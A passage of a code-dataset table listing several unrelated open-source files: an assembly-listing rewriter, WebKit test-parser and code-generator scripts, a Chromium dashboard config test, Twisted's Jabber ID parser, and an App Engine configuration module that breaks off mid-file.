repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
pfalcon/ScratchABlock
|
correct_internal_entrypoint.py
|
1
|
1344
|
#!/usr/bin/env python3
import sys
import os
import glob
def process_file(fname):
func_name = None
with open(fname) as f:
l = f.readline()
if not l.startswith("; Entry point: "):
return
l = l.strip()
head, func_name = l.rsplit(None, 1)
assert func_name
print("Processing:", fname)
os.rename(fname, fname + ".bak")
with open(fname + ".bak") as f, open(fname, "w") as f_out:
l = f.readline()
assert l[0] == ";"
# Don't write this line
l = f.readline()
addr, rest = l.split(None, 1)
f_out.write("%s.0 %s:\n" % (addr, func_name))
f_out.write("%s.0 goto %s.0\n" % (addr, func_name))
f_out.write(l)
for l in f:
addr, label = l.split(None, 1)
label = label.strip()
if label[-1] == ":" and not label.startswith("loc_"):
this_name = label[:-1]
if func_name == this_name:
l = l.replace(func_name, func_name + ".0")
f_out.write(l)
if __name__ == "__main__":
if os.path.isdir(sys.argv[1]):
for full_name in glob.glob(sys.argv[1] + "/*"):
if full_name.endswith(".lst") and os.path.isfile(full_name):
process_file(full_name)
else:
process_file(sys.argv[1])
|
gpl-3.0
|
likaiwalkman/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/w3c/test_parser.py
|
135
|
6756
|
#!/usr/bin/env python
# Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import logging
import re
from webkitpy.common.host import Host
from webkitpy.thirdparty.BeautifulSoup import BeautifulSoup as Parser
_log = logging.getLogger(__name__)
class TestParser(object):
def __init__(self, options, filename):
self.options = options
self.filename = filename
self.host = Host()
self.filesystem = self.host.filesystem
self.test_doc = None
self.ref_doc = None
self.load_file(filename)
def load_file(self, filename):
if self.filesystem.isfile(filename):
try:
self.test_doc = Parser(self.filesystem.read_binary_file(filename))
except:
# FIXME: Figure out what to do if we can't parse the file.
_log.error("Failed to parse %s", filename)
self.test_doc is None
else:
if self.filesystem.isdir(filename):
# FIXME: Figure out what is triggering this and what to do about it.
_log.error("Trying to load %s, which is a directory", filename)
self.test_doc = None
self.ref_doc = None
def analyze_test(self, test_contents=None, ref_contents=None):
""" Analyzes a file to determine if it's a test, what type of test, and what reference or support files it requires. Returns all of the test info """
test_info = None
if test_contents is None and self.test_doc is None:
return test_info
if test_contents is not None:
self.test_doc = Parser(test_contents)
if ref_contents is not None:
self.ref_doc = Parser(ref_contents)
# First check if it's a reftest
matches = self.reference_links_of_type('match') + self.reference_links_of_type('mismatch')
if matches:
if len(matches) > 1:
# FIXME: Is this actually true? We should fix this.
_log.warning('Multiple references are not supported. Importing the first ref defined in %s',
self.filesystem.basename(self.filename))
try:
ref_file = self.filesystem.join(self.filesystem.dirname(self.filename), matches[0]['href'])
except KeyError as e:
# FIXME: Figure out what to do w/ invalid test files.
_log.error('%s has a reference link but is missing the "href"', self.filesystem)
return None
if self.ref_doc is None:
self.ref_doc = self.load_file(ref_file)
test_info = {'test': self.filename, 'reference': ref_file}
# If the ref file path is relative, we need to check it for
# relative paths also because when it lands in WebKit, it will be
# moved down into the test dir.
#
# Note: The test files themselves are not checked for support files
# outside their directories as the convention in the CSSWG is to
# put all support files in the same dir or subdir as the test.
#
# All non-test files in the test's directory tree are normally
# copied as part of the import as they are assumed to be required
# support files.
#
# *But*, there is exactly one case in the entire css2.1 suite where
# a test depends on a file that lives in a different directory,
# which depends on another file that lives outside of its
# directory. This code covers that case :)
if matches[0]['href'].startswith('..'):
support_files = self.support_files(self.ref_doc)
test_info['refsupport'] = support_files
elif self.is_jstest():
test_info = {'test': self.filename, 'jstest': True}
elif self.options['all'] is True and not('-ref' in self.filename) and not('reference' in self.filename):
test_info = {'test': self.filename}
return test_info
def reference_links_of_type(self, reftest_type):
return self.test_doc.findAll(rel=reftest_type)
def is_jstest(self):
"""Returns whether the file appears to be a jstest, by searching for usage of W3C-style testharness paths."""
return bool(self.test_doc.find(src=re.compile('[\'\"/]?/resources/testharness')))
def support_files(self, doc):
""" Searches the file for all paths specified in url()'s, href or src attributes."""
support_files = []
if doc is None:
return support_files
elements_with_src_attributes = doc.findAll(src=re.compile('.*'))
elements_with_href_attributes = doc.findAll(href=re.compile('.*'))
url_pattern = re.compile('url\(.*\)')
urls = []
for url in doc.findAll(text=url_pattern):
url = re.search(url_pattern, url)
url = re.sub('url\([\'\"]?', '', url.group(0))
url = re.sub('[\'\"]?\)', '', url)
urls.append(url)
src_paths = [src_tag['src'] for src_tag in elements_with_src_attributes]
href_paths = [href_tag['href'] for href_tag in elements_with_href_attributes]
paths = src_paths + href_paths + urls
for path in paths:
if not(path.startswith('http:')) and not(path.startswith('mailto:')):
support_files.append(path)
return support_files
|
bsd-3-clause
|
zeptonaut/catapult
|
dashboard/dashboard/edit_site_config_test.py
|
4
|
4132
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import webapp2
import webtest
from google.appengine.api import users
from dashboard import edit_site_config
from dashboard import namespaced_stored_object
from dashboard import stored_object
from dashboard import testing_common
from dashboard import xsrf
class EditSiteConfigTest(testing_common.TestCase):
def setUp(self):
super(EditSiteConfigTest, self).setUp()
app = webapp2.WSGIApplication(
[('/edit_site_config', edit_site_config.EditSiteConfigHandler)])
self.testapp = webtest.TestApp(app)
testing_common.SetInternalDomain('internal.org')
self.SetCurrentUser('[email protected]', is_admin=True)
def testGet_NoKey_ShowsPageWithNoTextArea(self):
response = self.testapp.get('/edit_site_config')
self.assertEqual(0, len(response.html('textarea')))
def testGet_WithNonNamespacedKey_ShowsPageWithCurrentValue(self):
stored_object.Set('foo', 'XXXYYY')
response = self.testapp.get('/edit_site_config?key=foo')
self.assertEqual(1, len(response.html('form')))
self.assertIn('XXXYYY', response.body)
def testGet_WithNamespacedKey_ShowsPageWithBothVersions(self):
namespaced_stored_object.Set('foo', 'XXXYYY')
namespaced_stored_object.SetExternal('foo', 'XXXinternalYYY')
response = self.testapp.get('/edit_site_config?key=foo')
self.assertEqual(1, len(response.html('form')))
self.assertIn('XXXYYY', response.body)
self.assertIn('XXXinternalYYY', response.body)
def testPost_NoXsrfToken_ReturnsErrorStatus(self):
self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, 3]',
}, status=403)
def testPost_ExternalUser_ShowsErrorMessage(self):
self.SetCurrentUser('[email protected]')
response = self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, 3]',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertIn('Only internal users', response.body)
def testPost_WithKey_UpdatesNonNamespacedValues(self):
self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, 3]',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertEqual([1, 2, 3], stored_object.Get('foo'))
def testPost_WithSomeInvalidJSON_ShowsErrorAndDoesNotModify(self):
stored_object.Set('foo', 'XXX')
response = self.testapp.post('/edit_site_config', {
'key': 'foo',
'value': '[1, 2, this is not json',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertIn('Invalid JSON', response.body)
self.assertEqual('XXX', stored_object.Get('foo'))
def testPost_WithKey_UpdatesNamespacedValues(self):
namespaced_stored_object.Set('foo', 'XXXinternalYYY')
namespaced_stored_object.SetExternal('foo', 'XXXYYY')
self.testapp.post('/edit_site_config', {
'key': 'foo',
'external_value': '{"x": "y"}',
'internal_value': '{"x": "yz"}',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
self.assertEqual({'x': 'yz'}, namespaced_stored_object.Get('foo'))
self.assertEqual({'x': 'y'}, namespaced_stored_object.GetExternal('foo'))
def testPost_SendsNotificationEmail(self):
self.testapp.post('/edit_site_config', {
'key': 'foo',
'external_value': '{"x": "y"}',
'internal_value': '{"x": "yz"}',
'xsrf_token': xsrf.GenerateToken(users.get_current_user()),
})
messages = self.mail_stub.get_sent_messages()
self.assertEqual(1, len(messages))
self.assertEqual('[email protected]', messages[0].sender)
self.assertEqual('[email protected]', messages[0].to)
self.assertEqual(
'Config "foo" changed by [email protected]', messages[0].subject)
self.assertIn('{"x": "y"}', str(messages[0].body))
self.assertIn('{"x": "yz"}', str(messages[0].body))
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
Debian/openjfx
|
modules/web/src/main/native/Source/JavaScriptCore/inspector/scripts/codegen/generate_objc_backend_dispatcher_implementation.py
|
3
|
11619
|
#!/usr/bin/env python
#
# Copyright (c) 2014-2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import logging
import string
import re
from string import Template
from cpp_generator import CppGenerator
from generator import Generator
from models import PrimitiveType, EnumType, AliasedType, Frameworks
from objc_generator import ObjCTypeCategory, ObjCGenerator, join_type_and_name
from objc_generator_templates import ObjCGeneratorTemplates as ObjCTemplates
log = logging.getLogger('global')
class ObjCBackendDispatcherImplementationGenerator(ObjCGenerator):
def __init__(self, *args, **kwargs):
ObjCGenerator.__init__(self, *args, **kwargs)
def output_filename(self):
return '%sBackendDispatchers.mm' % self.protocol_name()
def domains_to_generate(self):
return filter(self.should_generate_commands_for_domain, Generator.domains_to_generate(self))
def generate_output(self):
secondary_headers = [
'"%sInternal.h"' % self.protocol_name(),
'"%sTypeConversions.h"' % self.protocol_name(),
'<JavaScriptCore/InspectorValues.h>',
]
header_args = {
'primaryInclude': '"%sBackendDispatchers.h"' % self.protocol_name(),
'secondaryIncludes': '\n'.join(['#include %s' % header for header in secondary_headers]),
}
domains = self.domains_to_generate()
sections = []
sections.append(self.generate_license())
sections.append(Template(ObjCTemplates.BackendDispatcherImplementationPrelude).substitute(None, **header_args))
sections.extend(map(self._generate_handler_implementation_for_domain, domains))
sections.append(Template(ObjCTemplates.BackendDispatcherImplementationPostlude).substitute(None, **header_args))
return '\n\n'.join(sections)
def _generate_handler_implementation_for_domain(self, domain):
commands = self.commands_for_domain(domain)
if not commands:
return ''
command_declarations = []
for command in commands:
command_declarations.append(self._generate_handler_implementation_for_command(domain, command))
return '\n'.join(command_declarations)
def _generate_handler_implementation_for_command(self, domain, command):
lines = []
parameters = ['long requestId']
for parameter in command.call_parameters:
parameters.append('%s in_%s' % (CppGenerator.cpp_type_for_unchecked_formal_in_parameter(parameter), parameter.parameter_name))
command_args = {
'domainName': domain.domain_name,
'commandName': command.command_name,
'parameters': ', '.join(parameters),
'successCallback': self._generate_success_block_for_command(domain, command),
'conversions': self._generate_conversions_for_command(domain, command),
'invocation': self._generate_invocation_for_command(domain, command),
}
return self.wrap_with_guard_for_domain(domain, Template(ObjCTemplates.BackendDispatcherHeaderDomainHandlerImplementation).substitute(None, **command_args))
def _generate_success_block_for_command(self, domain, command):
lines = []
if command.return_parameters:
success_block_parameters = []
for parameter in command.return_parameters:
objc_type = self.objc_type_for_param(domain, command.command_name, parameter)
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
success_block_parameters.append(join_type_and_name(objc_type, var_name))
lines.append(' id successCallback = ^(%s) {' % ', '.join(success_block_parameters))
else:
lines.append(' id successCallback = ^{')
if command.return_parameters:
lines.append(' Ref<InspectorObject> resultObject = InspectorObject::create();')
required_pointer_parameters = filter(lambda parameter: not parameter.is_optional and ObjCGenerator.is_type_objc_pointer_type(parameter.type), command.return_parameters)
for parameter in required_pointer_parameters:
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
lines.append(' THROW_EXCEPTION_FOR_REQUIRED_PARAMETER(%s, @"%s");' % (var_name, var_name))
objc_array_class = self.objc_class_for_array_type(parameter.type)
if objc_array_class and objc_array_class.startswith(self.objc_prefix()):
lines.append(' THROW_EXCEPTION_FOR_BAD_TYPE_IN_ARRAY(%s, [%s class]);' % (var_name, objc_array_class))
optional_pointer_parameters = filter(lambda parameter: parameter.is_optional and ObjCGenerator.is_type_objc_pointer_type(parameter.type), command.return_parameters)
for parameter in optional_pointer_parameters:
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
lines.append(' THROW_EXCEPTION_FOR_BAD_OPTIONAL_PARAMETER(%s, @"%s");' % (var_name, var_name))
objc_array_class = self.objc_class_for_array_type(parameter.type)
if objc_array_class and objc_array_class.startswith(self.objc_prefix()):
lines.append(' THROW_EXCEPTION_FOR_BAD_TYPE_IN_OPTIONAL_ARRAY(%s, [%s class]);' % (var_name, objc_array_class))
for parameter in command.return_parameters:
keyed_set_method = CppGenerator.cpp_setter_method_for_type(parameter.type)
var_name = ObjCGenerator.identifier_to_objc_identifier(parameter.parameter_name)
var_expression = '*%s' % var_name if parameter.is_optional else var_name
export_expression = self.objc_protocol_export_expression_for_variable(parameter.type, var_expression)
if not parameter.is_optional:
lines.append(' resultObject->%s(ASCIILiteral("%s"), %s);' % (keyed_set_method, parameter.parameter_name, export_expression))
else:
lines.append(' if (%s)' % var_name)
lines.append(' resultObject->%s(ASCIILiteral("%s"), %s);' % (keyed_set_method, parameter.parameter_name, export_expression))
lines.append(' backendDispatcher()->sendResponse(requestId, WTFMove(resultObject));')
else:
lines.append(' backendDispatcher()->sendResponse(requestId, InspectorObject::create());')
lines.append(' };')
return '\n'.join(lines)
def _generate_conversions_for_command(self, domain, command):
lines = []
if command.call_parameters:
lines.append('')
def in_param_expression(param_name, parameter):
_type = parameter.type
if isinstance(_type, AliasedType):
_type = _type.aliased_type # Fall through to enum or primitive.
if isinstance(_type, EnumType):
_type = _type.primitive_type # Fall through to primitive.
if isinstance(_type, PrimitiveType):
if _type.raw_name() in ['array', 'any', 'object']:
return '&%s' % param_name if not parameter.is_optional else param_name
return '*%s' % param_name if parameter.is_optional else param_name
return '&%s' % param_name if not parameter.is_optional else param_name
for parameter in command.call_parameters:
in_param_name = 'in_%s' % parameter.parameter_name
objc_in_param_name = 'o_%s' % in_param_name
objc_type = self.objc_type_for_param(domain, command.command_name, parameter, False)
if isinstance(parameter.type, EnumType):
objc_type = 'std::optional<%s>' % objc_type
param_expression = in_param_expression(in_param_name, parameter)
import_expression = self.objc_protocol_import_expression_for_parameter(param_expression, domain, command.command_name, parameter)
if not parameter.is_optional:
lines.append(' %s = %s;' % (join_type_and_name(objc_type, objc_in_param_name), import_expression))
if isinstance(parameter.type, EnumType):
lines.append(' if (!%s) {' % objc_in_param_name)
lines.append(' backendDispatcher()->reportProtocolError(BackendDispatcher::InvalidParams, String::format("Parameter \'%%s\' of method \'%%s\' cannot be processed", "%s", "%s.%s"));' % (parameter.parameter_name, domain.domain_name, command.command_name))
lines.append(' return;')
lines.append(' }')
else:
lines.append(' %s;' % join_type_and_name(objc_type, objc_in_param_name))
lines.append(' if (%s)' % in_param_name)
lines.append(' %s = %s;' % (objc_in_param_name, import_expression))
if lines:
lines.append('')
return '\n'.join(lines)
def _generate_invocation_for_command(self, domain, command):
pairs = []
pairs.append('WithErrorCallback:errorCallback')
pairs.append('successCallback:successCallback')
for parameter in command.call_parameters:
in_param_name = 'in_%s' % parameter.parameter_name
objc_in_param_expression = 'o_%s' % in_param_name
if not parameter.is_optional:
# FIXME: we don't handle optional enum values in commands here because it isn't used anywhere yet.
# We'd need to change the delegate's signature to take std::optional for optional enum values.
if isinstance(parameter.type, EnumType):
objc_in_param_expression = '%s.value()' % objc_in_param_expression
pairs.append('%s:%s' % (parameter.parameter_name, objc_in_param_expression))
else:
optional_expression = '(%s ? &%s : nil)' % (in_param_name, objc_in_param_expression)
pairs.append('%s:%s' % (parameter.parameter_name, optional_expression))
return ' [m_delegate %s%s];' % (command.command_name, ' '.join(pairs))
|
gpl-2.0
|
ashray/VTK-EVM
|
ThirdParty/Twisted/twisted/words/protocols/jabber/jid.py
|
68
|
7157
|
# -*- test-case-name: twisted.words.test.test_jabberjid -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Jabber Identifier support.
This module provides an object to represent Jabber Identifiers (JIDs) and
parse string representations into them with proper checking for illegal
characters, case folding and canonicalisation through L{stringprep<twisted.words.protocols.jabber.xmpp_stringprep>}.
"""
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep, resourceprep, nameprep
class InvalidFormat(Exception):
"""
The given string could not be parsed into a valid Jabber Identifier (JID).
"""
def parse(jidstring):
"""
Parse given JID string into its respective parts and apply stringprep.
@param jidstring: string representation of a JID.
@type jidstring: C{unicode}
@return: tuple of (user, host, resource), each of type C{unicode} as
the parsed and stringprep'd parts of the given JID. If the
given string did not have a user or resource part, the respective
field in the tuple will hold C{None}.
@rtype: C{tuple}
"""
user = None
host = None
resource = None
# Search for delimiters
user_sep = jidstring.find("@")
res_sep = jidstring.find("/")
if user_sep == -1:
if res_sep == -1:
# host
host = jidstring
else:
# host/resource
host = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
else:
if res_sep == -1:
# user@host
user = jidstring[0:user_sep] or None
host = jidstring[user_sep + 1:]
else:
if user_sep < res_sep:
# user@host/resource
user = jidstring[0:user_sep] or None
host = jidstring[user_sep + 1:user_sep + (res_sep - user_sep)]
resource = jidstring[res_sep + 1:] or None
else:
# host/resource (with an @ in resource)
host = jidstring[0:res_sep]
resource = jidstring[res_sep + 1:] or None
return prep(user, host, resource)
def prep(user, host, resource):
"""
Perform stringprep on all JID fragments.
@param user: The user part of the JID.
@type user: C{unicode}
@param host: The host part of the JID.
@type host: C{unicode}
@param resource: The resource part of the JID.
@type resource: C{unicode}
@return: The given parts with stringprep applied.
@rtype: C{tuple}
"""
if user:
try:
user = nodeprep.prepare(unicode(user))
except UnicodeError:
raise InvalidFormat, "Invalid character in username"
else:
user = None
if not host:
raise InvalidFormat, "Server address required."
else:
try:
host = nameprep.prepare(unicode(host))
except UnicodeError:
raise InvalidFormat, "Invalid character in hostname"
if resource:
try:
resource = resourceprep.prepare(unicode(resource))
except UnicodeError:
raise InvalidFormat, "Invalid character in resource"
else:
resource = None
return (user, host, resource)
__internJIDs = {}
def internJID(jidstring):
"""
Return interned JID.
@rtype: L{JID}
"""
if jidstring in __internJIDs:
return __internJIDs[jidstring]
else:
j = JID(jidstring)
__internJIDs[jidstring] = j
return j
class JID(object):
"""
Represents a stringprep'd Jabber ID.
JID objects are hashable so they can be used in sets and as keys in
dictionaries.
"""
def __init__(self, str=None, tuple=None):
if not (str or tuple):
raise RuntimeError("You must provide a value for either 'str' or "
"'tuple' arguments.")
if str:
user, host, res = parse(str)
else:
user, host, res = prep(*tuple)
self.user = user
self.host = host
self.resource = res
def userhost(self):
"""
Extract the bare JID as a unicode string.
A bare JID does not have a resource part, so this returns either
C{user@host} or just C{host}.
@rtype: C{unicode}
"""
if self.user:
return u"%s@%s" % (self.user, self.host)
else:
return self.host
def userhostJID(self):
"""
Extract the bare JID.
A bare JID does not have a resource part, so this returns a
L{JID} object representing either C{user@host} or just C{host}.
If the object this method is called upon doesn't have a resource
set, it will return itself. Otherwise, the bare JID object will
be created, interned using L{internJID}.
@rtype: L{JID}
"""
if self.resource:
return internJID(self.userhost())
else:
return self
def full(self):
"""
Return the string representation of this JID.
@rtype: C{unicode}
"""
if self.user:
if self.resource:
return u"%s@%s/%s" % (self.user, self.host, self.resource)
else:
return u"%s@%s" % (self.user, self.host)
else:
if self.resource:
return u"%s/%s" % (self.host, self.resource)
else:
return self.host
def __eq__(self, other):
"""
Equality comparison.
L{JID}s compare equal if their user, host and resource parts all
compare equal. When comparing against instances of other types, it
uses the default comparison.
"""
if isinstance(other, JID):
return (self.user == other.user and
self.host == other.host and
self.resource == other.resource)
else:
return NotImplemented
def __ne__(self, other):
"""
Inequality comparison.
This negates L{__eq__} for comparison with JIDs and uses the default
comparison for other types.
"""
result = self.__eq__(other)
if result is NotImplemented:
return result
else:
return not result
def __hash__(self):
"""
Calculate hash.
L{JID}s with identical constituent user, host and resource parts have
equal hash values. In combination with the comparison defined on JIDs,
this allows for using L{JID}s in sets and as dictionary keys.
"""
return hash((self.user, self.host, self.resource))
def __unicode__(self):
"""
Get unicode representation.
Return the string representation of this JID as a unicode string.
@see: L{full}
"""
return self.full()
def __repr__(self):
"""
Get object representation.
Returns a string that would create a new JID object that compares equal
to this one.
"""
return 'JID(%r)' % self.full()
|
bsd-3-clause
|
mikedchavez1010/XX-Net
|
gae_proxy/server/lib/google/appengine/api/conf.py
|
6
|
11768
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A library for managing flags-like configuration that update dynamically.
"""
import logging
import os
import re
import time
try:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.api import validation
from google.appengine.api import yaml_object
except:
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.ext import validation
from google.appengine.ext import yaml_object
DATASTORE_DEADLINE = 1.5
RESERVED_MARKER = 'ah__conf__'
NAMESPACE = '_' + RESERVED_MARKER
CONFIG_KIND = '_AppEngine_Config'
ACTIVE_KEY_NAME = 'active'
FILENAMES = ['conf.yaml', 'conf.yml']
PARAMETERS = 'parameters'
PARAMETER_NAME_REGEX = '[a-zA-Z][a-zA-Z0-9_]*'
_cached_config = None
class Config(db.Expando):
"""The representation of a config in the datastore and memcache."""
ah__conf__version = db.IntegerProperty(default=0, required=True)
@classmethod
def kind(cls):
"""Override the kind name to prevent collisions with users."""
return CONFIG_KIND
def ah__conf__load_from_yaml(self, parsed_config):
"""Loads all the params from a YAMLConfiguration into expando fields.
We set these expando properties with a special name prefix 'p_' to
keep them separate from the static attributes of Config. That way we
don't have to check elsewhere to make sure the user doesn't stomp on
our built in properties.
Args:
parse_config: A YAMLConfiguration.
"""
for key, value in parsed_config.parameters.iteritems():
setattr(self, key, value)
class _ValidParameterName(validation.Validator):
"""Validator to check if a value is a valid config parameter name.
We only allow valid python attribute names without leading underscores
that also do not collide with reserved words in the datastore models.
"""
def __init__(self):
self.regex = validation.Regex(PARAMETER_NAME_REGEX)
def Validate(self, value, key):
"""Check that all parameter names are valid.
This is used as a validator when parsing conf.yaml.
Args:
value: the value to check.
key: A description of the context for which this value is being
validated.
Returns:
The validated value.
"""
value = self.regex.Validate(value, key)
try:
db.check_reserved_word(value)
except db.ReservedWordError:
raise validation.ValidationError(
'The config parameter name %.100r is reserved by db.Model see: '
'http://code.google.com/appengine/docs/python/datastore/'
'modelclass.html#Disallowed_Property_Names for details.' % value)
if value.startswith(RESERVED_MARKER):
raise validation.ValidationError(
'The config parameter name %.100r is reserved, as are all names '
'beginning with \'%s\', please choose a different name.' % (
value, RESERVED_MARKER))
return value
class _Scalar(validation.Validator):
"""Validator to check if a value is a simple scalar type.
We only allow scalars that are well supported by both the datastore and YAML.
"""
ALLOWED_PARAMETER_VALUE_TYPES = frozenset(
[bool, int, long, float, str, unicode])
def Validate(self, value, key):
"""Check that all parameters are scalar values.
This is used as a validator when parsing conf.yaml
Args:
value: the value to check.
key: the name of parameter corresponding to this value.
Returns:
We just return value unchanged.
"""
if type(value) not in self.ALLOWED_PARAMETER_VALUE_TYPES:
raise validation.ValidationError(
'Expected scalar value for parameter: %s, but found %.100r which '
'is type %s' % (key, value, type(value).__name__))
return value
class _ParameterDict(validation.ValidatedDict):
"""This class validates the parameters dictionary in YAMLConfiguration.
Keys must look like non-private python identifiers and values
must be a supported scalar. See the class comment for YAMLConfiguration.
"""
KEY_VALIDATOR = _ValidParameterName()
VALUE_VALIDATOR = _Scalar()
class YAMLConfiguration(validation.Validated):
"""This class describes the structure of a conf.yaml file.
At the top level the file should have a params attribue which is a mapping
from strings to scalars. For example:
parameters:
background_color: 'red'
message_size: 1024
boolean_valued_param: true
"""
ATTRIBUTES = {PARAMETERS: _ParameterDict}
def LoadSingleConf(stream):
"""Load a conf.yaml file or string and return a YAMLConfiguration object.
Args:
stream: a file object corresponding to a conf.yaml file, or its contents
as a string.
Returns:
A YAMLConfiguration instance
"""
return yaml_object.BuildSingleObject(YAMLConfiguration, stream)
def _find_yaml_path():
"""Traverse directory trees to find conf.yaml file.
Begins with the current working direcotry and then moves up the
directory structure until the file is found..
Returns:
the path of conf.yaml file or None if not found.
"""
current, last = os.getcwd(), None
while current != last:
for yaml_name in FILENAMES:
yaml_path = os.path.join(current, yaml_name)
if os.path.exists(yaml_path):
return yaml_path
last = current
current, last = os.path.dirname(current), current
return None
def _fetch_from_local_file(pathfinder=_find_yaml_path, fileopener=open):
"""Get the configuration that was uploaded with this version.
Args:
pathfinder: a callable to use for finding the path of the conf.yaml
file. This is only for use in testing.
fileopener: a callable to use for opening a named file. This is
only for use in testing.
Returns:
A config class instance for the options that were uploaded. If there
is no config file, return None
"""
yaml_path = pathfinder()
if yaml_path:
config = Config()
config.ah__conf__load_from_yaml(LoadSingleConf(fileopener(yaml_path)))
logging.debug('Loaded conf parameters from conf.yaml.')
return config
return None
def _get_active_config_key(app_version):
"""Generate the key for the active config record belonging to app_version.
Args:
app_version: the major version you want configuration data for.
Returns:
The key for the active Config record for the given app_version.
"""
return db.Key.from_path(
CONFIG_KIND,
'%s/%s' % (app_version, ACTIVE_KEY_NAME),
namespace=NAMESPACE)
def _fetch_latest_from_datastore(app_version):
"""Get the latest configuration data for this app-version from the datastore.
Args:
app_version: the major version you want configuration data for.
Side Effects:
We populate memcache with whatever we find in the datastore.
Returns:
A config class instance for most recently set options or None if the
query could not complete due to a datastore exception.
"""
rpc = db.create_rpc(deadline=DATASTORE_DEADLINE,
read_policy=db.EVENTUAL_CONSISTENCY)
key = _get_active_config_key(app_version)
config = None
try:
config = Config.get(key, rpc=rpc)
logging.debug('Loaded most recent conf data from datastore.')
except:
logging.warning('Tried but failed to fetch latest conf data from the '
'datastore.')
if config:
memcache.set(app_version, db.model_to_protobuf(config).Encode(),
namespace=NAMESPACE)
logging.debug('Wrote most recent conf data into memcache.')
return config
def _fetch_latest_from_memcache(app_version):
"""Get the latest configuration data for this app-version from memcache.
Args:
app_version: the major version you want configuration data for.
Returns:
A Config class instance for most recently set options or None if none
could be found in memcache.
"""
proto_string = memcache.get(app_version, namespace=NAMESPACE)
if proto_string:
logging.debug('Loaded most recent conf data from memcache.')
return db.model_from_protobuf(proto_string)
logging.debug('Tried to load conf data from memcache, but found nothing.')
return None
def _inspect_environment():
"""Return relevant information from the cgi environment.
This is mostly split out to simplify testing.
Returns:
A tuple: (app_version, conf_version, development)
app_version: the major version of the current application.
conf_version: the current configuration version.
development: a boolean, True if we're running under devappserver.
"""
app_version = os.environ['CURRENT_VERSION_ID'].rsplit('.', 1)[0]
conf_version = int(os.environ.get('CURRENT_CONFIGURATION_VERSION', '0'))
development = os.environ.get('SERVER_SOFTWARE', '').startswith('Development/')
return (app_version, conf_version, development)
def refresh():
